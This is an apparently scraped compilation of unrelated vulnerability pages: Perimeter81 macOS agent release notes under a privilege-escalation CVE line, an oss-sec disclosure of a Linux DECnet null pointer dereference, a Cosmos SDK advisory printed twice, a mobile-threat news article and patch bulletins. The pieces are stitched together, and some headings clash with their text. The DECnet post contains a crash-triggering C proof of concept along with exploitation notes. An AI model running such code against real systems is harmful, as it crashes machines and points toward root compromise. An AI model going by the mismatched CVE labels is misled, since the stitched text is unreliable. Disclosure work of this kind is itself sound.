com.perimeter81.osx.HelperTool in Perimeter81 10.0.0.19 on macOS allows Local Privilege Escalation (to root) via shell metacharacters in usingCAPath.

Share feedback

Thanks for sharing your feedback!

**MacOS agent 10.0.0.19**

**May 7th, 2023**

**New Features:**

*   The agent now supports the new Exclude configuration option for Split Tunneling (so that all traffic except specific addresses will go through the tunnel).

**Resolved Issues:**

*   P81-23365 - Mac agent launching twice, 2 different instances running at the same time
*   P81-26071 - OpenVPN connection sometimes taking too long

**MacOS agent 9.0.1.9**

**New Features:**

*   You can now switch between protocols while the agent is connected to a network! Simply select a protocol in the Protocols tab to switch to it.
*   When the user session expires (according to the session length set by the administrator), the agent will be automatically logged out during local night time, in order to avoid disconnections during the workday. This applies to session lengths of 2 days and above.

**Enhancements:**

*   Logging improvements
*   Agent installation will be prevented on unsupported MacOS version 10.14 and below

**Resolved Issues:**

*   P81-18590 - On macOS 13.0, sometimes the quick access UI and Full agent UI were displayed simultaneously when changing networks
*   P81-20543 - Incorrect icon state after silent upgrade of the agent
*   P81-23034 - Agent disconnection after OS upgrade to Mac OS 13.2
*   P81-23462 - SWG Web Filtering not working when a rule is set with two custom URLs that one is contained within the other
*   P81-7337 - Agent logs show that user is using macOS 10.16 when it is actually a higher version

**MacOS agent 9.0.0.28**

**New Features:**

*   Secure Web Gateway (SWG) now includes Malware Protection! SWG users now have an additional layer of protection against malicious software, on top of the existing web filtering functionality. Malware Protection actively scans content before it reaches the user's browser, blocks multiple types of threats, and notifies the user. Admins can view logs of blocked malware in a new page under the Monitor and Logs section.

**Enhancements:**

*   Log file size decreased, implemented log rotation
*   Added support for long-life certificates for SDP sessions
*   Updated internal frameworks to support minimum target OS of 10.15
*   Improved SWG module behaviour, increased reliability of Proxy module
*   Improved memory usage of agent and fixed issues with memory leaks
*   Improved stability
*   Improved connectivity

**Resolved Issues:**  
P81-21296 - Fixed an issue related to the Disable Sign-out feature  
P81-22039 - Fixed issue when agent UI was out of sync with Daemon  
P81-14902 - Fixed Trusted Wired Network MAC address case-insensitive comparison

**MacOS agent 8.0.6.166**

**Resolved Issues:**  
P81-16293 - Excessive memory consumption when using SWG

**MacOS agent 8.0.6.163**

**New Features:**

*   The agent can now remain connected while P81 SDP backend is restarted/offline, for better connection stability

**Enhancements:**

*   Added additional logging events on VPN reconnection and Probe failure
*   In the Protocols section, relabeled 'Automatic' protocol to 'Default'
*   Improved mechanism for fetching Public IP
*   Increased shared codebase between MacOS and iOS agents for better compatibility

**Resolved Issues:**  
P81-12527, P81-12562 - Unplanned disconnections  
P81-12869, P81-6732 - Sporadically cannot login to the agent - 'your session was not established'  
P81-14787 - Routing table not updated on Split Tunneling update until user disconnects  
P81-13988 - Agent User Interface is cut off when it’s the rightmost icon in the macOS tray  
P81-7450 - Fixed sorting in Quick Access networks list  
P81-14953 - Install update prompt appears without user interaction  
P81-16096, P81-16864 - DPC failed although conditions passed, until reboot  
P81-16189, P81-16949 - While connecting to VPN on unsecured WiFi, Internet is unavailable for 40-60 seconds

**MacOS agent 8.0.5.143**

**New Features:**

*   New wake from sleep mechanism logic
*   Added 'Quit' button to the agent's quick-UI for easier access
*   Added 'Reset Agent' button to the loading screen if it does not connect within 60 seconds
*   Added 'Reset Agent' button to the full UI (under the Support tab) to provide the ability to reset the agent at any time

**Resolved Issues:**

*   P81-14321 - Infinite connection attempts
*   P81-14317 - The loading screen does not disapear
*   P81-13962 - Agent says it's connected but loses all Internet connectivity
*   P81-13257 - Possible command injection vector via DPC
*   P81-13188 - DPC stuck after machine reboot
*   P81-12978 - Proxy communication issue
*   P81-12749 - Presented with a "You have reached your pre-configured connection time limit" error
*   P81-12698 - DPC: Device Activity Log does not appears in web console at admission time, only after DPC scheduled recheck time (20 minutes)
*   P81-12360 - Agent log files take too much space (0.4 GB)
*   P81-7128 - The Device Activity log shows 'No Hostname' instead of the device name
*   P81-6628 - The user is not signed out properly after the agent receives a new token

**MacOS agent 8.0.4.132**

**New Features:**

*   Disable Sign-Out (enforce Always On) - this feature is being gradually rolled out and will be available to all customers in a few weeks. Requires this version of the agent and above.
*   Agent sign-out brute-force prevention
*   Allow admins to control whether using the internal DNS is enforced or not, in order to support co-existing with products that require control over DNS

**Enhancements:**

*   Agent version is now displayed before login, for easier troubleshooting
*   The Quit button has been re-added to the agent extended UI, allowing users to shut down the agent application and the Perimeter 81 service in case they need to
*   P81-11453 - SWG bootstrap certificate enhancement

**Resolved Issues:**

*   P81-13378 - Changing settings on the console would cause the agent to Reconnect
*   P81-12977 - RegionName always showed N/A
*   P81-12747, P81-12674, P81-12571, P81-12525, P81-12164 - Issues connencting after sleep
*   P81-12746 - Connectivity issue when using SWG
*   P81-12417, P81-12618 - Connectivity issues
*   P81-12560 - Sign-in failing to open browser
*   P81-12539, P81-12519 - Websites unreachable
*   P81-12536 - SWG rules issues
*   P81-12461 - Internet connection issue after session timeout
*   P81-12419 - Reconnection process takes too long
*   P81-12269 - Public IP stuck in "Refreshing" and losing Internet connectivity
*   P81-11170, P81-11171, P81-12807 - Internal log fixes
*   P81-6859 - Silent Upgrade improvements
*   P81-6467 - UI bugs
*   P81-11531 - Better handling of ProtocolFilters in regards to certificates
*   P81-12720 - SWG bug fixes

**MacOS agent 8.0.4.124**

**Enhancements:**

*   Changed MTU for Wireguard to 1380 to improve connectivity in low-MTU scenarios
    
*   The Perimeter 81 certificate is now installed only if using Secure Web Gateway. If needed, users are referred to a webpage on how to complete the certificate and add-on setup
    
*   'Start Minimized' removed from Settings screen
    

**Resolved Issues:**

P81-11830/P81-10601 Connection is not restored after sleep  
P81-11673 Sometimes the app Signed Out incorrectly  
P81-11251/P81-11163 Agent stuck with connect button not responding  
P81-11211 DNS fails after sleep on latest Mac version (Monterey 12.3)  
P81-11074/P81-10889 Constant disconnections  
P81-11071 Connection issue with IKE protocol  
P81-11035/P81-11034/P81-8381Connection issue with Wireguard  
P81-11027/P81-11026/P81-10631 Internet connection blocked/unstable  
P81-10922/P81-10916 After sleep, the agent is connected but there is no internet connectivity  
P81-10874 Sign In button not working after session timeout  
P81-10556 Network adaptor changing every several minutes  
P81-9987 Split tunneling configuration didn't updated till Agent reconnection  
P81-9804 Client generates certificate errors  
P81-8032 "Connected to Network" notification doesn't hide automatically  
P81-7340 After upgrading XPC between Daemons, Proxy is not starting  
P81-6312/P81-3930 "Private DNS" icon not displayed on network with "Regional Private DNS"  
P81-6080 Closed Mac agent pops up every time Firewall rule is changed

**MacOS agent 8.0.4.116**

Fixed Issues:

*   P81-9839/P81-9833/P81-9795 - App crash
*   P81-9794/P81-9493 Connection issue - agent stuck in 'Reconnecting'
*   P81-9500 Failed to connect while returning from sleep mode
*   P81-9181 Agent takes a while to reconnect after sleep
*   P81-9152 Sign Out pop-up header displayed incorrectly
*   P81-8233 Device Activity Log - MacBook still appears as Healthy even though found Not Healthy
*   P81-8048 Apple M1 Pro - Disconnect during Zoom
*   P81-7340 SWG - Proxy not starting after upgrading XPC between Daemons
*   P81-5273 .pkg error - 'The Package is unsigned'
*   P81-910 .pkg installer file - Unsupported file format in MobileIron
*   P81-8236 Icons for Support, Settings, Sign Out are blurred

New features:

*   P81-9985 When installing using pkg file, the P81 certificate will not be installed unless specified by admin
*   P81-7551 The agent now allows admins to pre-populate the workspace value during installation via CLI.

**MacOS agent 8.0.4.108**

Fixed Issues:

*   P81-6326 - Failed to login after agent upgrade.
*   P81-4795 - DNS lost randomly when using split tunneling + custom DNS.
*   P81-7608 - IPv6 behavior is unpredictable.
*   P81-5029 - Improved messaging when pre-configured connection time limit is reached.
*   P81-2455 - agent UI pops up upon changing firewall rules.
*   P81-5034 - renamed 'diagnose issues' button to 'Send logs to support'.

New Features:

*   The Perimeter 81 agent now runs as a service in the background! There is no need to keep the agent UI open - it is always up and available via an icon in the system tray.
*   Connectivity and stability have been improved.
*   The agent now has a brand new “quick access” UI, which allows you to perform most operations from a single screen by clicking on the tray icon. The classic UI is still available, and can still be accessed in order to configure settings, contact support etc.
*   This agent version supports Secure Web Gateway (SWG).

**MacOS agent 7.0.3.37**

Fixed issues:

*   P81-2389 - Helper tool installation requires admin permissions
*   P81-5385 - Crash on changing networks while OpenVPN connected on TWN
*   P81-5332 - Post connection loss authentication issue
*   P81-4796 - Correction of description for Automatic Protocol
*   P81-4764 - Agent stuck in reconnecting when coming out of sleep mode
*   P81-4368 - Agent stuck in Reconnecting state

New features:

*   P81-5029 - Improve the output message after "Automatically log out Client "
*   P81-5026 - Remove "contact support" suggestion when failing DPC
*   P81-5034 - Rename "diagnose issues" button
*   P81-4699 - Compatibility with MacOS 12.0 Monterey

**MacOS agent 7.0.3.28**

Fixed issues:

*   P81-3293 - Added latency measurements BI events
*   P81-3312 - Fixed device register issue caused by UDID non-escaping

**MacOS agent 7.0.2.21**

Fixed issues:

*   P81-1995 — Device posture check says that disk is not encrypted when it actually is encrypted
*   P81-2021 — Incorrect VPN status on Home screen if Start Minimized=ON and VPN has connected automatically
*   P81-2532 — Agent stuck on reconnecting
*   P81-3111 — DPC failed for all the rules that should pass
*   P81-3179 — App hanging during TWN check processing

**MacOS agent 7.0.2.19**

Fixed issues:

*   P81-2680 — Trusted Wired Networks - Agent user still needs to enter code on Quit/sign out while connected to TWN
*   P81-2198 — User still needs to enter code on Quit/Sign Out while on TWNP81-2198
*   P81-2633 — The Always On Not restored 0n turning Netwotk's toggle if Network above in list is Disabled
*   P81-2231 — Attempt to connect to the VPN is made on setting AlwaysOn by user
*   P81-2199 — No "Connected to Trusted Network" badge on Home screen when computer on TWN
*   P81-2198 — User still needs to enter code on Quit/Sign Out while on TWN
*   P81-2215 — The app connected to VPN on user setting AlwaysOn=ON while connected to TWN
*   P81-2550 — Show appropriate text when hovering over the "Connected to Trusted Network" badge
*   P81-2798 — MacOS P81 DPC: Condition "AND" for "Process Running" doesn't work

**MacOS 7.0.1.12**

*   Silent upgrade feature imlemented

**MacOS 7.0.1.7**

*   Fixed issue when agent app pops up with every ZTA change — P81-1117, P81-1115
*   Fixed wrong Device Name documented in Device Activity — P81-1364
*   Fixed Internal IP Not Defined issue, when VPN get connected — P81-1347
*   Moved Snowplow session cache file outside of the user’s Documents folder — P81-937

**MacOS 7.0.1.6****New features:**

*   Device Posture Check feature implemented

**Resolved Issues:**

*   Fixed app crash issue — P81-726
*   Fixed app re-connect issue when losing WiFi — P81-906
*   Fixed Run on StartUp issue — P81-914
*   Fixed Sign Out” and “Quit” option from doesn’t work if app is not in foreground — P81-1027
*   Fixed app re-login when DPC check has failed — P81-1452
*   Fixed Disconnect/Connect notifications showing — P81-1110
*   Fixed high CPU consumption issue when the app is in background — P81-438
*   Fixed SDP socket re-connect issue after sleep-mode

**MacOS 7.0.0 (7):****Bug fixes:**

*   Application complete re-design, Main view, Settings page, Support page, OnBoarding page
*   Implemented new login flow using default browser with SSO support
*   Implemented accessToken token rotation before performing Logout call -- #MAC-1056
*   Added timeout for LoginSucceeded event -- #MAC-1075
*   Added full username showing inside of the Main view (if it’s available) -- #MAC-1083
*   Added support ticket number for the user if it’s available from Troubleshooting -- #MAC-1074
*   Change user’s email address fetching from JWT to channel.OnUpdated data payload -- #MAC-1066
*   Fixed Connection/Reconnection initiated from Connect on Launch can’t be interrupted -- #MAC-1079
*   Fixed Hide Automatic Location from Icon/Dock menus -- #MAC-1086
*   Fixed issue when Admin can’t enforce upgrade to the latest version -- #MAC-942
*   Disable KillSwitch by default for AlwaysON -- #MAC-1081
*   Fixed Sleep/awake re-connect issue -- #MAC-1061
*   Fixed Disconnect button non-responsiveness when agent connecting/reconnecting -- #MAC-1078
*   Fixed expand/collapse Shared Networks issue, when hover stopped to work -- #MAC-1062
*   Fixed issues when “Change Network” button displayed incorrectly when “Upgrade Application” is enforced -- #MAC-1111
*   Added BI events sending support
*   Added osVersion as a part of channel.open payload
*   Implemented automated Troubleshooting script, now avg processing time is ~1 min -- #MAC-1093
*   Fixed “Sign Out” and “Quit” options from notification area context menu when app is in background mode -- #MAC-1100, #MAC-1099
*   Fixed “Automatic Location” network option -- #MAC-1096
*   Added tooltips for SignOut / Exit Settings buttons, Main + OnBoarding windows appear at the same time -- #MAC-1088
*   Fixed “Automatic Location” network option -- #MAC-1096
*   Fixed UI blinking when switching between Home tab and any other -- #MAC-1073
*   Fix network selection logic -- #MAC-1087

Was this article helpful?

CVE-2023-33298: MacOS - Agent

A flaw null pointer dereference in the Linux kernel DECnet networking protocol was found. A remote user could use this flaw to crash the system.

**oss-sec mailing list archives**

_From_: Ornaghi Davide - Betrusted <davide.ornaghi () betrusted it>  
_Date_: Sat, 24 Jun 2023 16:11:36 +0000  

Hi all,



I'm reporting a Null Pointer Dereference vulnerability that I found while attempting to ping localhost by sending a 
Hello message to a local DECnet socket:



\`\`\`
\[45620.986136\] BUG: kernel NULL pointer dereference, address: 0000000000000000
\[45620.986141\] #PF: supervisor read access in kernel mode
\[45620.986143\] #PF: error\_code(0x0000) - not-present page
\[45620.986146\] PGD 0 P4D 0
\[45620.986148\] Oops: 0000 \[#1\] PREEMPT SMP NOPTI
\[45620.986152\] CPU: 6 PID: 37997 Comm: test Tainted: G        W    L    5.19.0-43-generic #44~22.04.1-Ubuntu
\[45620.986155\] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 
11/12/2020
\[45620.986156\] RIP: 0010:dn\_nsp\_send+0x1c9/0x200 \[decnet\]
\[45620.986159\] Code: 74 3e 8d 48 01 f0 0f b1 4a 40 41 0f 94 c6 45 84 f6 74 eb 48 89 d3 49 89 d7 48 83 e3 fe 48 89 55 90 
e8 eb f7 ac c0 48 8b 55 90 <48> 8b 02 48 8b 80 e8 00 00 00 49 89 85 e8 01 00 00 e9 93 fe ff ff
\[45620.986161\] RSP: 0018:ffffc90032abfc90 EFLAGS: 00010246
\[45620.986164\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
\[45620.986165\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
\[45620.986166\] RBP: ffffc90032abfd00 R08: 0000000000000000 R09: 0000000000000000
\[45620.986167\] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881aca6f9c0
\[45620.986168\] R13: ffff888118903cc0 R14: 0000000000000000 R15: 0000000000000000
\[45620.986172\] FS:  00007f144e58b740(0000) GS:ffff888339d80000(0000) knlGS:0000000000000000
\[45620.986173\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[45620.986175\] CR2: 0000000000000000 CR3: 0000000226154004 CR4: 0000000000770ee0
\[45620.986185\] PKRU: 55555554
\[45620.986186\] Call Trace:
\[45620.986189\]  <TASK>
\[45620.986191\]  dn\_nsp\_send\_conninit+0x207/0x4c0 \[decnet\]
\[45620.986196\]  \_\_dn\_connect+0x172/0x230 \[decnet\]
\[45620.986220\]  dn\_connect+0x5c/0xa0 \[decnet\]
\[45620.986223\]  \_\_sys\_connect\_file+0x68/0x80
\[45620.986225\]  \_\_sys\_connect+0xb6/0xe0
\[45620.986227\]  ? exit\_to\_user\_mode\_loop+0xf1/0x140
\[45620.986228\]  ? exit\_to\_user\_mode\_prepare+0x3b/0xd0
\[45620.986230\]  ? syscall\_exit\_to\_user\_mode+0x2a/0x50
\[45620.986232\]  ? do\_syscall\_64+0x69/0x90
\[45620.986234\]  \_\_x64\_sys\_connect+0x18/0x30
\[45620.986236\]  do\_syscall\_64+0x59/0x90
\[45620.986237\]  ? exit\_to\_user\_mode\_prepare+0x3b/0xd0
\[45620.986241\]  ? syscall\_exit\_to\_user\_mode+0x2a/0x50
\[45620.986242\]  ? do\_syscall\_64+0x69/0x90
\[45620.986244\]  entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
\`\`\`

## Bug details

This crash is due to the dn\_nsp\_send function (net/decnet/dn\_nsp\_out.c) which, first off, causes a Denial of Service by 
preventing the release of locks such as the current sock's sk->sk\_lock, but could also lead to Local Privilege 
Escalation under certain conditions.

When first starting a connection with a DECnet socket, the connect() handler \_\_dn\_connect, while building a route, ends 
up calling dst\_alloc (net/decnet/dn\_route.c:1178) which initializes the dst reference counter to 0 instead of 1 (see 
commit 76371d2e3ad1f84426a30ebcd8c3b9b98f4c724f for an explanation).
Later on, dn\_insert\_route is expected to increase the dst refcount, but in reality, it fails to do so, since 
dst\_hold\_and\_use (net/decnet/dn\_route.c:347) actually calls atomic\_inc\_not\_zero on dst->\_\_refcnt, which only works if 
the refcount is not 0. While the refcount hasn't changed, the dst->\_use counter is correctly incremented by 
dst\_use\_noref.

\`\`\`c
static inline void dst\_hold(struct dst\_entry \*dst)
{
    BUILD\_BUG\_ON(offsetof(struct dst\_entry, \_\_refcnt) & 63);
    WARN\_ON(atomic\_inc\_not\_zero(&dst->\_\_refcnt) == 0);            <===
}
\`\`\`

Therefore, a warning gets thrown.
As a consequence, all the following sk\_dst\_get(sk) calls will return NULL since this function also uses 
atomic\_inc\_not\_zero, and returns NULL on failure.
This condition leads to a NPD at net/decnet/dn\_nsp\_out.c:92:

\`\`\`c
if (dn\_route\_output\_sock(&sk->sk\_dst\_cache, &fld, sk, 0) == 0) {
    dst = sk\_dst\_get(sk);
    sk->sk\_route\_caps = dst->dev->features;                        <===   dst is NULL
    goto try\_again;
}
\`\`\`

## Exploitation scenarios

Furthermore, the try\_again label redirects the execution to the following code:

\`\`\`c
if (dst) {
    try\_again:
    skb\_dst\_set(skb, dst);
    dst\_output(&init\_net, skb->sk, skb);        <===
    return;
}
\`\`\`

where the dst->output() function is invoked by dst\_output to send the outgoing packet after the routing decision. In an 
attacker's ideal conditions, where the zero page is mappable, this allows arbitrary code execution.

In more modern systems, the previous scenario can be triggered multiple times to possibly control other reference 
counters and thus trigger further vulnerabilities such as UAF.
For instance, one could force the sock->file (from \_\_sys\_sendto) refcount to wrap around and eventually free it, though 
a definitive exploitation technique is still under study.

## Vulnerable versions

Linux kernels with DECnet support from Linux-4.12-rc7 (commit 76371d2e3ad1f84426a30ebcd8c3b9b98f4c724f) up to 
Linux-6.0.19.
The said subsystem has been removed during the 6.1 merge window because deprecated.

## Proof-of-Concept

The kernel has to be compiled with CONFIG\_DECNET=y and should have a DECnet address assigned (echo -n "1.10" > 
/proc/sys/net/decnet/node\_address):

\`\`\`c
int main() {
    int sockfd;

    if ((sockfd = socket(AF\_DECnet, SOCK\_SEQPACKET, DNPROTO\_NSP)) == -1) {
        perror("socket");
        exit(-1);
    }
    struct sockaddr\_dn sockaddr;
    struct nodeent dp;
    static struct dn\_naddr addr;
    char \*nodename = "turtle";
    addr.a\_addr\[0\] = 10 & 0xFF;
    addr.a\_addr\[1\] = (1 << 2) | ((10 & 0x300) >> 8);
    sockaddr.sdn\_family = AF\_DECnet;
    sockaddr.sdn\_flags  = 0x00;
    sockaddr.sdn\_objnum  = DNOBJECT\_MIRROR;
    sockaddr.sdn\_objnamel  = 0x00;

    dp.n\_addr = (unsigned char \*)&addr.a\_addr;
    dp.n\_length = 2;
    dp.n\_name = nodename;
    dp.n\_addrtype = AF\_DECnet;

    if (connect(sockfd, (struct sockaddr \*)&sockaddr, sizeof(sockaddr)) < 0) {
        perror("socket");
        exit(-1);
    }
    return 0;
}
\`\`\`

Writing a PoC that returns a root shell on devices without SMAP and vm.mmap\_min\_addr is also trivial.

## Bug fix

This was my suggested patch:

\`\`\`diff
--- a/net/decnet/dn\_route.c     2023-06-06 15:55:36.615147110 +0200
+++ b/net/decnet/dn\_route.c     2023-06-06 15:56:00.179416949 +0200
@@ -1175,7 +1175,7 @@ make\_route:
        if (dev\_out->flags & IFF\_LOOPBACK)
                flags |= RTCF\_LOCAL;

-       rt = dst\_alloc(&dn\_dst\_ops, dev\_out, 0, DST\_OBSOLETE\_NONE, 0);
+       rt = dst\_alloc(&dn\_dst\_ops, dev\_out, 1, DST\_OBSOLETE\_NONE, 0);
        if (rt == NULL)
                goto e\_nobufs;
\`\`\`

Also, always make sure that dst isn't NULL after sk\_dst\_get:

\`\`\`diff
--- a/net/decnet/dn\_nsp\_out.c   2023-06-06 22:01:57.212802584 +0200
+++ b/net/decnet/dn\_nsp\_out.c   2023-06-06 22:04:37.138709847 +0200
@@ -89,7 +89,9 @@ try\_again:
        fld.flowidn\_proto = DNPROTO\_NSP;
        if (dn\_route\_output\_sock(&sk->sk\_dst\_cache, &fld, sk, 0) == 0) {
                dst = sk\_dst\_get(sk);
-               sk->sk\_route\_caps = dst->dev->features;
+               if (!dst)
+                       return;
+               sk->sk\_route\_caps = dst->dev->features;
                goto try\_again;
        }
\`\`\`

The DECnet subsystem has been officially removed from all longterm and stable kernel series, starting from 4.14.319, 
4.19.287, 5.4.248, 5.10.185 and 5.15.118.

Best regards,

Davide Ornaghi

**Current thread:**

*   **CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet** _Ornaghi Davide - Betrusted (Jun 24)_
    *   Re: CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet _Peter Philip Pettersson (Jun 24)_

CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet

# x/crisis does not charge ConstantFee
### Impact
If a transaction is sent to the `x/crisis` module to check an invariant, the ConstantFee parameter of the chain is NOT charged. All versions of the `x/crisis` module are affected on all versions of the Cosmos SDK.

### Details
The `x/crisis` module is supposed to allow anyone to halt a chain in the event of a violated invariant by sending a `MsgVerifyInvariant` with the name of the invariant. Processing this message takes extra processing power hence a `ConstantFee` was introduced on the chain that is charged as extra from the reporter for the extra computational work. This is supposed to avert spammers on the chain making nodes do extra computations using this transaction. By not charging the `ConstantFee`, the transactions related to invariant checking are relatively cheaper compared to the computational need and other transactions.

That said, the submitter still has to pay the transaction fee to put the transaction on the network, hence using this weakness for spamming is limited by the usual mechanisms.

Synthetic testing showed up to a 20% increase in CPU usage on a validator node that is spammed by hundreds of `MsgVerifyInvariant` messages which still makes this an expensive operation to carry out on a live blockchain network.

### Patches
The `ConstantFee` charge of the `x/crisis` module will either be fixed or disabled in an upcoming regular release of the Cosmos SDK.

The `x/crisis` module was originally intended to allow chains to halt rather than continue with some unknown behavior in the case of an invariant violation (safety over liveness). However, as chains mature, and especially as the potential [cost of halting increases](https://github.com/osmosis-labs/osmosis/issues/570), chains should consider carefully what invariants they really want to halt for, and what invariants are just sort of helpful sanity checks.

The SDK team is working on new modules that allow chain developers to fine-tune the chain invariants and the necessary actions.

Hence, the decision was made that the `x/crisis` module will be deprecated when new modules take over its responsibilities.

### Workarounds
There is no workaround posted. Validators are advised to leave some extra computing room on their servers for possible spamming scenarios. (This is a good measure in any case.)

### References
SDK developer epic about invariant checking: https://github.com/cosmos/cosmos-sdk/issues/15706


**x/crisis does not charge ConstantFee****Impact**

If a transaction is sent to the x/crisis module to check an invariant, the ConstantFee parameter of the chain is NOT charged. All versions of the x/crisis module are affected on all versions of the Cosmos SDK.

**Details**

The x/crisis module is supposed to allow anyone to halt a chain in the event of a violated invariant by sending a MsgVerifyInvariant with the name of the invariant. Processing this message takes extra processing power hence a ConstantFee was introduced on the chain that is charged as extra from the reporter for the extra computational work. This is supposed to avert spammers on the chain making nodes do extra computations using this transaction. By not charging the ConstantFee, the transactions related to invariant checking are relatively cheaper compared to the computational need and other transactions.

That said, the submitter still has to pay the transaction fee to put the transaction on the network, hence using this weakness for spamming is limited by the usual mechanisms.

Synthetic testing showed up to a 20% increase in CPU usage on a validator node that is spammed by hundreds of MsgVerifyInvariant messages which still makes this an expensive operation to carry out on a live blockchain network.

**Patches**

The ConstantFee charge of the x/crisis module will either be fixed or disabled in an upcoming regular release of the Cosmos SDK.

The x/crisis module was originally intended to allow chains to halt rather than continue with some unknown behavior in the case of an invariant violation (safety over liveness). However, as chains mature, and especially as the potential cost of halting increases, chains should consider carefully what invariants they really want to halt for, and what invariants are just sort of helpful sanity checks.

The SDK team is working on new modules that allow chain developers to fine-tune the chain invariants and the necessary actions.

Hence, the decision was made that the x/crisis module will be deprecated when new modules take over its responsibilities.

**Workarounds**

There is no workaround posted. Validators are advised to leave some extra computing room on their servers for possible spamming scenarios. (This is a good measure in any case.)

**References**

SDK developer epic about invariant checking: cosmos/cosmos-sdk#15706

**References**

*   GHSA-w5w5-2882-47pc
*   cosmos/cosmos-sdk#15706

GHSA-w5w5-2882-47pc: github.com/cosmos/cosmos-sdk's x/crisis does not charge ConstantFee

The number of malware samples is up as attackers aim to compromise users where they work and play: Their smartphones.

Attackers are increasingly targeting users through their mobile devices, attacking vulnerabilities in services that are built into applications and mounting increasing numbers of SMS phishing attacks.

That's according to mobile security firm Zimperium's 2023 "Global Mobile Threat Report," which also found that the average number of unique mobile malware samples grew 51% in 2022, totaling an average of 77,000 unique malware samples found every month. About a quarter of application samples submitted to public repositories — 23% of Android apps and 24% of iOS apps — were malicious, according to data in the report.

In total, that all contributed to the number of compromised devices nearly tripling (up 187%) in the time period, because the tactics are working: The company saw an average of four malicious phishing links clicked per device, for instance.

The trend comes as companies and their workers rely increasingly on mobile devices, with a majority of firms seeing more workers (58%) using mobile devices for business than in 2021 and most users (59%) doing more work with their mobile devices, according to the 2022 "Verizon Mobile Security Index" report. 

"Businesses and users need to mostly be concerned about mobile phishing and spyware today, and mobile ransomware will become increasingly concerning in the near future," says JT Keating, senior vice president of strategic initiatives at Zimperium. 

**Android, iOS Devices See Different Levels of Cyber Threats**

About 80% of phishing sites specifically target mobile devices with content suited to those platforms, Zimperium stated in its 2023 "Global Mobile Threat Report." But, as has been the case for many years, the Android platform tends to attract more threats. One of the reasons for that could be that the Android operating system has seen between about 500 and 900 vulnerabilities disclosed per year that threat actors can target; iOS meanwhile saw a little more than 300 vulnerabilities in five of the last eight years, according to Zimperium. 

Another reason that Android is a bigger target? App development mistakes. The firm found that there are more mistakes made in the process of developing apps when it comes to Android, particularly when it comes to how those apps interact with cloud storage instances. Only about 2% of iOS applications access unprotected cloud instances, while 10% of Android apps do so. These include database instances accessed through Google Firebase and Cloud Platform, Amazon Simple Storage Service (S3), and Microsoft Azure Cloud Storage, according to Zimperium's report. As a corollary, developers also tend to access the same poor resources, too: Only 1% of unprotected cloud instances accounted for 60% of applications at risk, the company said.

Georgy Kucherin, a security expert at Kaspersky's Global Research and Analysis Team (GReAT), says his firm's research bears out the finding that Android attracts more overall threats, though he notes that when it comes to spyware the targeting is evenly split between the two ecosystems; the recent Triangulation cyber espionage campaign for instance shows the value in targeting the iOS platform.

"Mobile users should worry about both cybercrime threats and nation-state espionage, \[but\] it is correct to say that Android faces more general threats," he says. "Android devices are more likely to become infected with malware distributed by cybercriminals. As for top-notch espionage spyware, both iOS and Android are vulnerable to it."

The lack of jailbreaking utilities for the latest version of iOS is also lowering the number of attacks for that platform, according to Zimperium. Jailbreaking allows users to add non-Apple-sanctioned software to their mobile devices, but it also removes significant security guardrails in the process. 

**Threats Up, or Leveling Off?**

In terms of the types of mobile malware that's circulating out there, Kaspersky saw fewer mobile malware installers and less ransomware in the past year, but more banking Trojans, it stated in "The Mobile Malware Threat Landscape in 2022" report.

"Cybercriminals are still working on improving both malware functionality and spread vectors," according to the report. "Malware is increasingly spreading through legitimate channels, such as official marketplaces and ads in popular apps. This is true for both scam apps and dangerous mobile banking malware."

To put all of this into perspective, it should be noted that traditional computing platforms still attract the lion's share of the cybercrime pie. Kaspersky, for example, blocked more than 20 million malicious installers, spyware, and adware attacks on mobile devices over the last four quarters, but blocked more than 20 times that number against more common work platforms, such as Windows. However, the mobile threat vector is not as well protected. 

"In most cases, mobile devices represent a significant, unaddressed attack surface for enterprises," Zimperium's Keating says. "No matter if they are corporate-owned or part of a BYOD strategy, the need to implement appropriate security controls, and educate end-users about potential threats, is critical."

Mobile Cyberattacks Soar, Especially Against Android Users

A potential Time-of-Check to Time-of-Use (TOCTOU) vulnerability has been identified in certain HP PC products using AMI UEFI Firmware (system BIOS), which might allow arbitrary code execution. AMI has released updates to mitigate the potential vulnerability.

CVE-2023-26299: AMI UEFI Firmware June 2023 Security Update (TOCTOU)

Plus: Microsoft fixes 78 vulnerabilities, VMWare plugs a flaw already used in attacks, and more critical updates from June.

Summer software updates are coming thick and fast, with Apple, Google, and Microsoft issuing multiple patches for serious security flaws in June. Enterprise software firms have also been busy, with fixes released for scary holes in VMWare, Cisco, Fortinet, and Progress Software’s MOVEit products.

A significant number of security bugs squashed during the month are being used in real-life attacks, so read on, take note, and patch your affected systems as soon as you can.

Apple

Hot on the heels of iOS 16.5, June saw the release of an emergency iPhone upgrade, iOS 16.5.1. The latest iPhone update fixes security vulnerabilities in WebKit, the engine that underpins Safari, and in the kernel at the heart of the iOS system.

Tracked as CVE-2023-32439 and CVE-2023-32434, both issues are code-execution bugs and have been used in real-life attacks, Apple said on its support page.

While details about the already exploited flaws are limited, security outfit Kaspersky revealed how the kernel issue was used to perform “iOS Triangulation” attacks against its staff. Impactful because they require no interaction from the user, the “zero click” attacks use an invisible iMessage with a malicious attachment to deliver spyware.

Apple has also issued iOS 15.7.7 for older iPhones fixing the Kernel and WebKit issues, as well as a second WebKit flaw tracked as CVE-2023-32435—which was also reported by Kaspersky as part of the iOS Triangulation attacks.

Meanwhile, Apple released Safari 16.5.1, macOS Ventura 13.4.1, macOS Monterey 12.6.7, macOS Big Sur 11.7.8 , watchOS 9.5.2 and watchOS 8.8.1.

Microsoft

Microsoft’s mid-June Patch Tuesday includes security updates for 78 vulnerabilities, including 28 remote code execution (RCE) bugs. While some of the issues are serious, it is the first Patch Tuesday since March that doesn’t include any already exploited flaws.

The critical issues patched in the June update include CVE-2023-29357, an elevation of privilege vulnerability in Microsoft SharePoint Server with a CVSS score of 9.8. “An attacker who has gained access to spoofed JWT authentication tokens can use them to execute a network attack which bypasses authentication and allows them to gain access to the privileges of an authenticated user,” Microsoft said.

“The attacker needs no privileges, nor does the user need to perform any action,” it added.

